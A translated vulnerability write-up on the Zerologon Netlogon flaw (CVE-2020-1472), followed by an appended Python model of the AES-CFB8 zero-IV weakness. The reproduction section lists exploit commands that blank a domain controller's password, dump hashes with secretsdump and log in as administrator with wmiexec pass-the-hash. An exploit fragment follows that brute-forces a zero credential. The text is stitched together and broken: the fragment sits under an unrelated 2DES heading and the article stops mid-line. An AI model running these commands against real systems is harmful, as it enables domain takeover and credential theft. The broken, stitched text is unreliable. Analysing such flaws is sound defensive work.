How to analyze Netlogon privilege escalation vulnerability CVE-2020-1472

2025-01-23 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31 Report--

Today I will talk about how to analyze the Netlogon privilege escalation vulnerability CVE-2020-1472. Many people may not know much about it, so to help you understand it better the editor has summarized the following content. I hope you get something out of this article.

I. Vulnerability information

1. Brief description of the vulnerability

Vulnerability name: Netlogon privilege escalation vulnerability

Vulnerability number: CVE-2020-1472

CVSS score: 10

Exploitation difficulty: simple

Requires a basic user account: no

2. Component overview

The Netlogon remote protocol is a remote procedure call (RPC) interface for user and computer authentication on domain-based networks. The Netlogon remote protocol RPC interface is also used to replicate databases for backup domain controllers (BDC).

The Netlogon remote protocol is used to maintain domain relationships from domain members to domain controllers (DCs), between DCs within a domain, and between DCs across domains. This RPC interface is used to discover and manage these relationships.

3. Vulnerability exploitation

The vulnerability stems from a flaw in the cryptographic part of the authentication protocol used when a Netlogon secure channel is established with the domain controller. It allows an attacker to set the password of the domain controller administrator account to empty, then obtain password hashes and finally gain administrator rights. Successful exploitation allows logging in to the domain controller with administrator privileges and taking control of the whole domain.

4. Vulnerability impact

Microsoft Windows Server 2008 R2 SP1

Microsoft Windows Server 2012

Microsoft Windows Server 2012 R2

Microsoft Windows Server 2016

Microsoft Windows Server 2019

Microsoft Windows Server version 2004 (Server Core Installation)

Microsoft Windows Server version 1903 (Server Core Installation)

Microsoft Windows Server version 1909 (Server Core Installation)

5. Solution

Microsoft's official solution to the vulnerability is divided into two parts:

Part 1: release a security update for this vulnerability first. Patch address: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472

Part 2: complete full protection of all devices joined to the domain (including non-Windows devices) by Q1 2021.

II. Vulnerability reproduction

1. Environment setup

Domain controller IP: xxxx

Target machine operations:

Install impacket:

python setup.py install

2. Vulnerability detection

Use a public test script to detect the vulnerability:

pip install -r requirements.txt

python Scan.py ADSrv01

Test results:

(1) The target is vulnerable

(2) The update patch has been installed

3. Vulnerability exploitation

Similarly, exploitation is verified using a public exploit script (which resets the password to empty):

python poc.py ADSrv01

Run result (the environment differs from the detection environment, but this does not affect exploitation):

Then dump the hashes using the empty password (the -hashes value is LMHASH:NTHASH, with the LM part left empty):

python secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'Domain/DC_NETBIOS_NAME$@dc_ip_addr'

Example: secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'v4ler1an/ADSrv01$@'

Here I use PowerShell, so a cmd window pops up, outputs the hash information and then closes quickly. You can use Linux to keep the window from closing immediately:

Here you can obtain the administrator's password hash and then log in using the hash:

wmiexec.py -hashes HASH DOMAIN/USERNAME@IP

The example here is:

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8756481b09eec95190a6663a2dd879ab v4ler1an/administrator@

Follow-up actions:

III. Vulnerability analysis

1. Basic information

Vulnerable file: dll

Vulnerable function: NetrServerAuthenticate3, among others

Vulnerable algorithm: AES-CFB8

2. Background knowledge

The Netlogon Remote Protocol is an RPC interface exposed on Windows domain controllers. It is used to perform a variety of tasks related to user and computer authentication, the most common of which is letting users log in to servers using the NTLM protocol. Other features include authenticating NTP responses and, in particular, allowing a computer to update its password within the domain. The RPC interface is reachable over TCP (on a dynamic port assigned through the domain controller's portmapper service) or through an SMB pipe on port 445.

The protocol does not use the same authentication scheme as other RPC services. Instead it uses a cryptographic protocol that lets the client (a domain member) and the domain controller confirm knowledge of the client account's password hash. The main reason for this design is that in the Windows NT era computer accounts were not a regular principal, so standard user authentication schemes such as NTLM or Kerberos could not be used.

A Netlogon session is initiated by the client. The client and server exchange random 8-byte values (called challenges), and both then compute a session key by mixing the two challenges with the client account's password hash using a key derivation function. The client then computes a client credential using the derived session key.

The server recomputes the same credential, and if the result matches the client's, it concludes that the client knows the correct account password and session key, and the verification passes.

During the authentication handshake, client and server can also negotiate whether subsequent messages are encrypted and cryptographically authenticated (called sealing and signing), mainly to defend against network-level attackers. Even when encryption is not used, Netlogon calls that perform important actions still carry an authenticator value, which is also computed using the session key.

3. Detailed analysis

The cryptographic primitive used by client and server to generate the credential is implemented by the ComputeNetlogonCredential() function, which takes an 8-byte input and transforms it using the session key into an 8-byte output. The security idea is that an attacker who does not know the session key cannot compute or guess the correct output for a given input, and therefore cannot produce a credential that authenticates successfully.

1. Two algorithms for computing the credential

There are two algorithms that can be used to compute the credential: AES-CFB8 and 2DES.

2DES

When computing with 2DES, the logic for computing the session key is as follows (fragment of the public test script; the surrounding code was cut off in the original):

    # request['SecureChannelType'] = secureChannelType -> nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel: NETLOGON_SECURE_CHANNEL_TYPE enumeration value indicating the type of secure channel established by this call.
    # request['ClientCredential'] = clientCredential -> ciphertext: a pointer to the NETLOGON_CREDENTIAL structure that contains the client credential.
    # request['ComputerName'] = checkNullString(computerName) -> target_computer + '\x00': a null-terminated Unicode string containing the NetBIOS name of the client computer calling this method.
    # request['NegotiateFlags'] = negotiateFlags -> flags
    # return dce.request(request)

            # Verification succeeded
            assert server_auth['ErrorCode'] == 0
            return rpc_con
        except nrpc.DCERPCSessionError as ex:
            # On failure a STATUS_ACCESS_DENIED error is reported; this error is returned until the brute force succeeds.
            if ex.get_error_code() == 0xc0000022:
                return None
            else:
                fail(f'Unexpected error code from DC: {ex.get_error_code()}.')
        except BaseException as ex:
            fail(f'Unexpected error: {ex}.')

    def perform_attack(dc_handle, dc_ip, target_computer):
        # Brute force; succeeds after 256 attempts on average
        print('Performing authentication attempts...')
        rpc_con = None
        for attempt in range(0, MAX_ATTEMPTS):
            rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
            if rpc_con is None:
                print('=', end='', flush=True)
            else:
                break
        if rpc_con:
            print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
        else:
            print('Target is probably patched.')
            sys.exit(1)

    if __name__ == '__main__':
        if not (3
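Added example (not code from the article or from the public scripts it mentions) modelling the ComputeNetlogonCredential construction described above and the "256 attempts on average" figure in the fragment: CFB8 with an all-zero IV maps the all-zero challenge to an all-zero credential for roughly one session key in 256. A keyed SHA-256 truncation stands in for the AES block function, an assumption that does not affect the result, since the property comes from the mode and the fixed IV rather than from the cipher.

```python
import hashlib
import random

BLOCK_SIZE = 16  # AES block size in bytes; the stand-in keeps the same shape

def stand_in_block_fn(key: bytes):
    """16-byte block function E_k. A keyed SHA-256 truncation stands in for AES
    (assumption of this example): the flaw below is CFB8 with a zero IV, not AES."""
    return lambda block: hashlib.sha256(key + block).digest()[:BLOCK_SIZE]

def cfb8_encrypt(block_fn, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: XOR each plaintext byte with the first byte of E_k(register), then
    shift the resulting ciphertext byte into the register."""
    register, out = bytearray(iv), bytearray()
    for p in plaintext:
        c = block_fn(bytes(register))[0] ^ p
        out.append(c)
        del register[0]
        register.append(c)
    return bytes(out)

def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """Model of ComputeNetlogonCredential: CFB8 over the 8-byte input with a fixed
    all-zero IV. For a zero challenge the register stays all zeros whenever
    E_k(0)[0] == 0, so the whole credential is zero for about 1 key in 256."""
    return cfb8_encrypt(stand_in_block_fn(session_key), bytes(BLOCK_SIZE), challenge)

def random_bytes(rng: random.Random, n: int = BLOCK_SIZE) -> bytes:
    return rng.getrandbits(8 * n).to_bytes(n, "big")

def zero_credential_rate(trials: int, seed: int = 0) -> float:
    """Fraction of random session keys mapping the zero challenge to the zero
    credential: about 1/256, versus 1/2**64 for a sound construction."""
    rng = random.Random(seed)
    hits = sum(compute_netlogon_credential(random_bytes(rng), bytes(8)) == bytes(8)
               for _ in range(trials))
    return hits / trials

def random_iv_breaks_the_pattern(seed: int = 0) -> bool:
    """Find a key that collapses to zeros under the zero IV, then run the same CFB8
    with an unpredictable IV: the all-zero output no longer appears."""
    rng = random.Random(seed)
    key = random_bytes(rng)
    while compute_netlogon_credential(key, bytes(8)) != bytes(8):
        key = random_bytes(rng)
    return cfb8_encrypt(stand_in_block_fn(key), random_bytes(rng), bytes(8)) != bytes(8)
```

With a few thousand trials, zero_credential_rate() lands near 0.004, which is why a brute force of the zero credential is expected to succeed in about 256 tries, while random_iv_breaks_the_pattern() shows that a per-session random IV would have removed the shortcut.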
